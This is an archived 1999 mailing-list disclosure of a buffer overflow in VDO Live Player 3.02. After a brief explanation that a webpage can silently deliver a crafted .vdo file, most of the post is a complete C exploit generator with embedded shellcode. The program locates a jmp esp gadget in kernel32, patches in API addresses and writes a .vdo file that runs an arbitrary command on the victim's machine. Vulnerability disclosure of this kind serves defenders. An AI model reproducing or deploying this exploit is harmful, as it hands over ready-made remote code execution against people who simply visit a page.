VDO Live Player 3.02 Buffer Overflow

From: UNYUN (shadowpenguinat_private)
Date: Sun Dec 12 1999 - 13:25:16 PST
Next message: Stephen White: "Re: Big problem on 2.0.x?"
Previous message: visi0n: "Big problem on linux 2.0"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello

VDO Live Player overflows when that reads the .vdo file that contains
the long address. If VDO Live Player is installed on the system and the
setting of browser is default, .vdo file is downloaded and executed
without the confirmation. So, if the clients visit the webpage which is
written the automatic download code of vdo file (such as META tag) that
contains the attack code, the client machine will be cracked by the
instructions which are written in vdo file.

The buffer which is specified by ESP is too small to put the complex
code, but the top line of the vdo file is stored at the address of
ecx+0x30, it is long enough to set the cracking code.

The following sample source code generates the .vdo file that
executes any commands on the visitors machine.
(This code is tested Japanese Windows98 only)

-----
/*====================================================================
   ex_vdolive.c / VDO Live Player 3.02 32bit exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguinat_private)
  ===================================================================
*/

#include    <stdio.h>
#include    <string.h>
#include    <windows.h>

#define     RETADR          90
#define     CODE1_OFS       102
#define     CODE2_OFS       10
#define     MAXBUF1         180
#define     MAXBUF2         1500
#define     JMPESP_1        0xff
#define     JMPESP_2        0xe4
#define     NOP             0x90
#define     KERNEL_NAME     "kernel32.dll"

unsigned char exploit_jmping[100]={
0x33,0xDB,0x8B,0x41,0x30,0xB3,0xBB,0x03,
0xC3,0xFF,0xE0,0x00};

unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,
0x52,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23,
0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
0xF0,0x5A,0x43,0x53,0x52,0x32,0xE4,0x83,
0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,0x83,
0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,
0xFF,0xFF,0x00};
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.";


unsigned int search_mem(unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char   *p;
    unsigned int    adr;

    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
            adr=(unsigned int)p;
            if ((adr&0xff)==0) continue;
            if (((adr>>8)&0xff)==0) continue;
            if (((adr>>16)&0xff)==0) continue;
            if (((adr>>24)&0xff)==0) continue;
            return(adr);
        }
    return(0);
}

main(int argc,char *argv[])
{
    unsigned int         i,kp,ip,p1,p2;
    static unsigned char buf1[MAXBUF1],buf2[MAXBUF2],*q;
    FILE                 *fp;
    MEMORY_BASIC_INFORMATION meminfo;

    if (argc<2){
        printf("usage: %s FileName Command\n",argv[0]);
        exit(1);
    }
    if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){
        printf("Can not find %s\n",KERNEL_NAME);
        exit(1);
    }

    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
    for (i=0;i<meminfo.RegionSize;i++){
        ip=kp+i;
        if ( ( ip     &0xff)==0
          || ((ip>>8 )&0xff)==0
          || ((ip>>16)&0xff)==0
          || ((ip>>24)&0xff)==0) continue;
        q=(unsigned char *)ip;
        if (*q==JMPESP_1 && *(q+1)==JMPESP_2) break;
    }
    if (i==meminfo.RegionSize){
        printf("Can not find codes which are used by this exploit.\n");
        exit(1);
    }

    printf("RETADR  : %x\n",ip);
    memset(buf1,NOP,MAXBUF1-1);
    memset(buf2,NOP,MAXBUF2-1);
    buf1[RETADR  ]=ip&0xff;
    buf1[RETADR+1]=(ip>>8)&0xff;
    buf1[RETADR+2]=(ip>>16)&0xff;
    buf1[RETADR+3]=(ip>>24)&0xff;
    strcat(cmdbuf,argv[2]);
    strncpy(buf1+CODE1_OFS,exploit_jmping,strlen(exploit_jmping));
    p1=(unsigned int)GetProcAddress((HMODULE)kp,"LoadLibraryA");
    p2=(unsigned int)GetProcAddress((HMODULE)kp,"GetProcAddress");
    printf("LoadLibrary Address    : %x\n",p1);
    printf("GetProcAddress Address : %x\n",p2);

    strcat(exploit_code,cmdbuf);
    exploit_code[0x0d]=p1&0xff;
    exploit_code[0x0e]=(p1>>8)&0xff;
    exploit_code[0x0f]=(p1>>16)&0xff;
    exploit_code[0x10]=(p1>>24)&0xff;
    exploit_code[0x21]=exploit_code[0x35]=p2&0xff;
    exploit_code[0x22]=exploit_code[0x36]=(p2>>8)&0xff;
    exploit_code[0x23]=exploit_code[0x37]=(p2>>16)&0xff;
    exploit_code[0x24]=exploit_code[0x38]=(p2>>24)&0xff;
    exploit_code[0x41]=strlen(argv[2]);

    memcpy(buf2+CODE2_OFS,exploit_code,strlen(exploit_code));

    strncpy(buf1,"vdo://",6);
    buf1[MAXBUF1]=0;
    buf2[MAXBUF2]=0;
    if ((fp=fopen(argv[1],"w"))==NULL){
        printf("Can not create '%s'\n",argv[1]);
        exit(1);
    }
    fprintf(fp,"%s/%s\n",buf1,buf2);
    printf("File '%s' is created.\n",argv[1]);
    return FALSE;
}

-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
   shadowpenguinat_private (webmaster)
% eEye Digital Security Team [ http://www.eEye.com ]
   unyunat_private
Next message: Stephen White: "Re: Big problem on 2.0.x?"
Previous message: visi0n: "Big problem on linux 2.0"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:20:35 PDT